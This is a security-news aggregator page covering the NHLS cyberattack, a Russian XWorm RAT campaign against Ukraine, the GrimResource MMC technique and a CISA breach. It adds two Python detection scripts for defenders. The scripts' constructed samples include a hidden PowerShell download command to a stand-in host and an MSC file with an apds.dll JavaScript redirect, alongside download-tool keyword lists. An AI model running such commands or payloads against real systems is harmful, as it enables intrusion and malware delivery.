The post Remote ID Proofing Good Practices appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
RedTeam Tips Orchestrating Chaos Evading Defense Culture
Red Teaming involves simulating cyberattacks to test an organization’s defenses. Red Teams adopt the mindset of adversaries, aiming to uncover vulnerabilities and assess the effectiveness of defensive measures. This practice is crucial in improving an organization’s security posture and resilience against real-world attacks. Key Strategies for Orchestrating Chaos and Evading Defense: Developing a Red Team […]
The post RedTeam Tips Orchestrating Chaos Evading Defense Culture appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
- Why Red Teams Play a Central Role in Helping Organizations Secure AI Systems
The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free. Thank you. The CISO2CISO Advisors Team.
The post Why Red Teams Play a Central Role in Helping Organizations Secure AI Systems appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
- Red Report 2024 – The Top 10 Most Prevalent MITRE ATT&CK® Techniques The Rise of Hunter-Killer Malware
Marking its fourth year of publication, the Red Report 2024™ provides a critical dive into the evolving threat landscape, presenting a detailed analysis of adversaries’ most prevalent tactics, techniques, and procedures (TTPs) used throughout the past year. Conducted by Picus Labs, this annual study examines over 600,000 malware samples and assesses more than 7 million instances […]
The post Red Report 2024 – The Top 10 Most Prevalent MITRE ATT&CK® Techniques The Rise of Hunter-Killer Malware appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
Cybersecurity News and Magazine
- Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems
Impact on South Africa's National Health Laboratory Service
NHLS Chief Executive Officer Prof Koleka Mlisana informed staff of the incident in a memo, stating that the breach had caused damage and that the organization was treating the matter with extreme urgency and concern. Mlisana stated, “I regret to inform you that our IT systems are unavailable due to a suspected incident that occurred over the weekend.” Mlisana assured staff that the organization's Incident Response Team was working around the clock to determine the scope of the intrusion and deploy the necessary safeguards to secure systems and data.

The NHLS has implemented its "Downtime Protocol" to minimize disruption to services, prioritizing patients' samples and processing, with results communicated directly to clinicians whenever urgent. The cyber attack comes at a critical time for South Africa's healthcare system. The country is currently grappling with an Mpox outbreak, and the NHLS was already facing a significant backlog in toxicology tests as of March. The shutdown of IT systems is likely to exacerbate these challenges.

Mzi Gcukumana, the NHLS Communication, Marketing, and PR officer, disclosed: “Preliminary investigation suggests that our Enterprise Resource Planning (Oracle) environment, Laboratory Information System (LIS) (TrakCare) database, and CDW are not affected. Therefore, no patient data has been lost or compromised. All patient data is safe."

Response and Recovery Efforts
“Please rest assured that our priority focus is on data security. We are determined to solve this issue swiftly and transparently,” Mlisana stated to patients. In response to the breach, the NHLS has deployed its Incident Response Team to assess the scope of the intrusion and implement necessary safeguards. Mlisana assured staff that the team is working around the clock to secure systems and data. “I want to take this opportunity to thank you in advance as we all put in our efforts to ensure that disruption to our services is minimised,” Mlisana added.

The NHLS has determined that certain sections of its systems, including its backup server, were deleted, requiring the affected systems to be rebuilt. Gcukumana stated, “All users will be aware that the NHLS networked laboratory system is heavily reliant on these information technology systems that have been disrupted.” He added, “Unfortunately, this will take time, and investigations thus far have not advanced enough for us to give a timeframe for the restoration of our systems and full service. All stakeholders and the public will be informed as soon as more information becomes available.”

The National Department of Health, which oversees the NHLS, has been informed of the incident. A spokesperson for the department called for patience as efforts to resolve the issue continue. As the investigation unfolds, the NHLS has promised regular updates on the compromise and ongoing response activities. The organization emphasizes its commitment to data security and swift, transparent resolution of the issue.

Russian Hackers Target Ukraine with XWorm RAT Malware Payload
Technical Overview of XWorm RAT Campaign
The campaign begins with a malicious LNK shortcut file, disguised as a legitimate Excel document, which runs a PowerShell script when opened. The script downloads two files, "pkg.zip" and "NewCopy.xlsx", from a specified URL. The shortcut then launches "pythonw.exe" using the start command, which copies the dropped files into a new folder. "pythonw.exe" loads a malicious DLL, "python310.dll", through DLL sideloading, and the DLL injects shellcode into the MSBuild process.
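As an added example (not Cyble's code or the detections from the original report), the following Python sketches how the delivery chain above could be flagged in endpoint telemetry. The sample events are constructed to resemble Sysmon process-create and image-load records; the allow-list of directories where pythonw.exe is expected to live, the download cues matched in the PowerShell command line, and the assumption that pythonw.exe itself starts MSBuild.exe are all assumptions for the example, not details taken from the report.

```python
"""Flag the LNK -> PowerShell -> pythonw.exe sideload -> MSBuild chain in process telemetry.

Added example, not Cyble's detection logic. Events are constructed to look like
Sysmon Event ID 1 (process create) and Event ID 7 (image load) records.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    kind: str                  # "process" (process create) or "load" (image load)
    pid: int
    image: str                 # full path of the process executable
    parent_image: str = ""     # parent executable (process events)
    cmdline: str = ""          # command line (process events)
    loaded: str = ""           # DLL path (load events)


DOWNLOAD_CUES = ("downloadfile", "invoke-webrequest", "iwr ", "curl ", "http://", "https://")
DROPPED_NAMES = ("pkg.zip", "newcopy.xlsx")   # file names reported for this campaign
# Assumed allow-list: directories where a legitimate pythonw.exe would be installed
TRUSTED_PY_DIRS = ("\\program files\\python", "\\appdata\\local\\programs\\python")


def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    norm = path.replace("/", "\\").lower()
    return norm.rsplit("\\", 1)[0] if "\\" in norm else ""


def _trusted_python(path: str) -> bool:
    return any(d in path.lower() for d in TRUSTED_PY_DIRS)


def detect_xworm_chain(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs, one per chain stage observed in the telemetry."""
    findings: List[Tuple[int, str]] = []
    for ev in events:
        img = _name(ev.image)
        if ev.kind == "process":
            parent = _name(ev.parent_image)
            cl = ev.cmdline.lower()
            # Stage 1: the LNK opened from Explorer runs PowerShell that fetches the two files
            if (img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe"
                    and any(c in cl for c in DOWNLOAD_CUES)
                    and any(n in cl for n in DROPPED_NAMES)):
                findings.append((ev.pid, "lnk_powershell_download"))
            # Stage 2: pythonw.exe started from a directory that is not a Python install
            if img == "pythonw.exe" and not _trusted_python(ev.image):
                findings.append((ev.pid, "pythonw_untrusted_location"))
            # Stage 4: MSBuild (the injection target) started by pythonw; assumed spawn relation
            if img == "msbuild.exe" and parent == "pythonw.exe":
                findings.append((ev.pid, "msbuild_spawned_by_pythonw"))
        elif ev.kind == "load":
            # Stage 3: python310.dll sideloaded from the EXE's own untrusted directory
            if (img == "pythonw.exe" and _name(ev.loaded) == "python310.dll"
                    and _dir(ev.loaded) == _dir(ev.image)
                    and not _trusted_python(ev.loaded)):
                findings.append((ev.pid, "python310_dll_sideload"))
    return findings


# Constructed sample telemetry (not a real capture) following the campaign's stages
SAMPLE_EVENTS = [
    Event("process", 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          cmdline='powershell -w hidden -c "iwr http://example.invalid/pkg.zip -o pkg.zip; '
                  'iwr http://example.invalid/NewCopy.xlsx -o NewCopy.xlsx"'),
    Event("process", 4188, r"C:\Users\victim\AppData\Roaming\Copy\pythonw.exe",
          parent_image=r"C:\Windows\System32\cmd.exe", cmdline="pythonw.exe"),
    Event("load", 4188, r"C:\Users\victim\AppData\Roaming\Copy\pythonw.exe",
          loaded=r"C:\Users\victim\AppData\Roaming\Copy\python310.dll"),
    Event("process", 4230, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
          parent_image=r"C:\Users\victim\AppData\Roaming\Copy\pythonw.exe", cmdline="MSBuild.exe"),
    # Benign control: a real Python install loading its own runtime DLL
    Event("process", 5001, r"C:\Program Files\Python310\pythonw.exe",
          parent_image=r"C:\Windows\explorer.exe", cmdline="pythonw.exe script.py"),
    Event("load", 5001, r"C:\Program Files\Python310\pythonw.exe",
          loaded=r"C:\Program Files\Python310\python310.dll"),
]

if __name__ == "__main__":
    for pid, finding in detect_xworm_chain(SAMPLE_EVENTS):
        print(pid, finding)
```

Each stage is scored on its own so that a partial chain (for instance, only the sideload, if PowerShell logging is off) still surfaces; correlating the findings by PID and parent PID gives the full kill chain. The benign control events show why the location check matters: a real Python install legitimately loads python310.dll from its own directory.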
Protecting Against XWorm RAT
The XWorm RAT used in the campaign is designed to be easily accessible even to threat actors lacking sophistication and technical expertise. The versatile malware offers several functions, including data theft, DDoS attacks, cryptocurrency address manipulation, ransomware deployment, and downloading additional malware onto compromised systems. Cyble researchers have recommended several measures to defend against this campaign:
- Implement strong email filtering to block malicious attachments.
- Exercise caution with email attachments, especially from unknown senders.
- Limit execution of scripting languages where possible.
- Use application whitelisting to control which programs can run.
- Deploy robust antivirus and anti-malware solutions.
- Enforce strong, unique passwords and two-factor authentication.
- Monitor networks for unusual activity or data exfiltration attempts.
GrimResource: New Microsoft Management Console Attack Found in Wild
GrimResource Attack Uses Old XSS Flaw
GrimResource is “a novel, in-the-wild code execution technique leveraging specially crafted MSC files,” the researchers wrote. “GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (mmc.exe) with minimal security warnings, ideal for gaining initial access and evading defenses.”

The key to the technique is an old XSS flaw in the apds.dll library. “By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of mmc.exe,” they said. Attackers can combine the technique with DotNetToJScript to gain arbitrary code execution.

The sample begins with a TransformNode obfuscation technique, recently reported by open source tool developer Philippe Lagadec in unrelated macro samples. The obfuscation helps evade ActiveX security warnings and leads to an obfuscated embedded VBScript, which sets the target payload in a series of environment variables before using DotNetToJScript to execute an embedded .NET loader. The researchers named that component PASTALOADER. PASTALOADER retrieves the payload from the environment variables set by the VBScript and “spawns a new instance of dllhost.exe and injects the payload into it. This is done in a deliberately stealthy manner using the DirtyCLR technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.”

Using the DotNetToJScript technique also triggers a detection for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine. The researchers created a rule in Elastic’s Event Query Language (EQL) to detect execution via the .NET loader.

GrimResource Detection Rules Provided
Those detections can be bypassed with stealthier methods, the researchers noted, but the technique itself leaves artifacts: using apds.dll to execute JScript via XSS shows up in mmc.exe's Procmon output as a CreateFile operation on apds.dll (the DLL is not loaded as a library), and the APDS XSS redirection creates a temporary HTML file named redirect[*] in the INetCache folder. In addition to the EQL rules, the researchers also provided a YARA detection rule.
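As an added example, not Elastic's own YARA or EQL rule, the following Python parses an MSC console file and flags StringTable entries that reference apds.dll, the file-level artifact described above. The two sample console files are constructed for the example; the res:// URL form of the reference, the StringTables/StringTable/Strings/String element layout and the all-zero GUID are assumptions about how such a file looks, not details from the researchers' sample.

```python
"""Scan an MSC console file for StringTable references to apds.dll (GrimResource indicator).

Added example, not Elastic's detection rule. MSC files are XML with an
MMC_ConsoleFile root; the StringTable layout used in the samples below is assumed.
"""
import re
import xml.etree.ElementTree as ET
from typing import List

APDS_RE = re.compile(r"apds\.dll", re.I)
SCRIPT_RE = re.compile(r"javascript:|vbscript:|<script\b", re.I)


def scan_msc(xml_text: str) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings: List[str] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # MMC would reject malformed XML too, but still report a raw apds.dll mention
        if APDS_RE.search(xml_text):
            findings.append("apds_reference_in_malformed_xml")
        return findings
    if root.tag != "MMC_ConsoleFile":
        return findings  # not a console file at all
    # iter() walks every String element regardless of how deeply the tables are nested
    for node in root.iter("String"):
        text = node.text or ""
        if APDS_RE.search(text):
            tag = "stringtable_apds_reference"
            if SCRIPT_RE.search(text):
                tag += "_with_script"   # the XSS redirect target carries the script itself
            findings.append(f"{tag}: id={node.get('ID')}")
    return findings


# Constructed sample: a minimal console file carrying an apds.dll redirect in its StringTable
MALICIOUS_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables>
    <StringTable>
      <GUID>{00000000-0000-0000-0000-000000000000}</GUID>
      <Strings>
        <String ID="1" Refs="1">Console Root</String>
        <String ID="2" Refs="1">res://apds.dll/redirect.html?target=javascript:alert(1)</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

# Constructed sample: the same console without the malicious entry
BENIGN_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables>
    <StringTable>
      <GUID>{00000000-0000-0000-0000-000000000000}</GUID>
      <Strings>
        <String ID="1" Refs="1">Console Root</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_MSC), ("benign", BENIGN_MSC)):
        print(label, scan_msc(doc) or "clean")
```

Because the check keys on the apds.dll reference rather than on any particular obfuscation of the payload, it still fires when the JScript stage is wrapped in TransformNode or other encoding tricks; an attacker would have to drop the APDS reference altogether, which is the part of the chain that grants execution in mmc.exe.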
CISA: Hackers Breached Chemical Facilities’ Data in January
Potential Data Compromised in Chemical Facilities' Targeting
CISA's investigation found no direct evidence of data exfiltration but indicated that the hackers might have accessed critical information such as site security plans, security vulnerability assessments (SVAs), and user accounts within CSAT. Additionally, "Top-Screen surveys," which detail the types and quantities of chemicals, their properties, and storage methods at facilities, might have been exposed. High-risk chemical facilities are mandated to submit SVAs outlining their critical assets, cyber and physical security policies, and an analysis of potential vulnerabilities. Other compromised documents could include details on cybersecurity measures, alarms and physical barriers in place at these facilities.

CISA's Response and Recommendations
CISA has informed participants in the Chemical Facility Anti-Terrorism Standards (CFATS) program about the potential data exposure. Although no credentials were confirmed to be stolen, CISA advises those with CSAT accounts to reset any identical business or personal passwords. It also recommends that organizations using Ivanti products review a February advisory about recent vulnerabilities. The agency cannot directly notify individuals submitted for terrorist vetting under the CFATS Personnel Surety Program because it did not collect their contact information. However, identity protection services will be offered to those affected, specifically those vetted between December 2015 and July 2023.

Investigation Findings
The breach was detected on January 26, when CISA discovered hackers installing tools on an Ivanti device. Further investigation revealed multiple accesses to the system over two days. Various departments within CISA and the Department of Homeland Security (DHS) were involved in the investigation, which confirmed no hacker access beyond the initial Ivanti device. Despite the absence of evidence for data exfiltration, the potential risk to numerous individuals and organizations categorized this intrusion as a "major incident" under the Federal Information Security Modernization Act (FISMA). CISA is setting up a call center to assist impacted individuals, although it is not yet operational. The agency did not comment on the perpetrators of the attack, but since 2020, CISA has cautioned organizations about state-sponsored hackers, including those linked to China, exploiting vulnerabilities in Ivanti products.

Experts Say More Transparency Required
Roger Grimes, a data-driven defense evangelist at KnowBe4, lauded CISA's intent and the fact that it publicly accepted the hack but said a bit more transparency would have done no harm.
"I'm a big fan of CISA. I think they do wonderful work. Still, it would be useful to have better, full transparency," Grimes told The Cyber Express. "Was their Ivanti device exploited by an unpatched, but known vulnerability, or exploited by a 0-day? If they were exploited by a known vulnerability where a patch was available, which is more likely, why wasn't the patch installed? Was it simply due to the fact that the exploit happened faster than the patch could be applied? Was the patch missed? If the patch was missed, why? Or was it a 0-day, misconfiguration, or credential compromise?"
"This is not to embarrass CISA, but to learn why one of the best, most aggressive patch-pushing, cyber-defending organizations in the world got compromised," Grimes added. "Sharing what happened and why can help other organizations facing similar problems and challenges learn lessons.
"CISA is always pushing for other industries and vendors to be more transparent about their compromises so that we can all learn from the lessons and mistakes. I expect CISA to do the same and even lead by example when it's their infrastructure involved."
Fresh MOVEit Bug Under Attack Mere Hours After Disclosure
Indonesia Refuses to Pay $8M Ransom After Cyberattack
Security Boulevard
- USENIX Security ’23 – Catch You and I Can: Revealing Source Voiceprint Against Voice Conversion
Authors/Presenters: Jiangyi Deng, Yanjiao Chen, Yinan Zhong, Qianhao Miao, Xueluan Gong, Wenyuan Xu
Many thanks to USENIX for publishing their outstanding USENIX Security ’23 presenters' content, and for the organization's strong commitment to Open Access.
Originating from the conference's events at the Anaheim Marriott, and via the organization's YouTube channel.
The post USENIX Security ’23 – Catch You and I Can: Revealing Source Voiceprint Against Voice Conversion appeared first on Security Boulevard.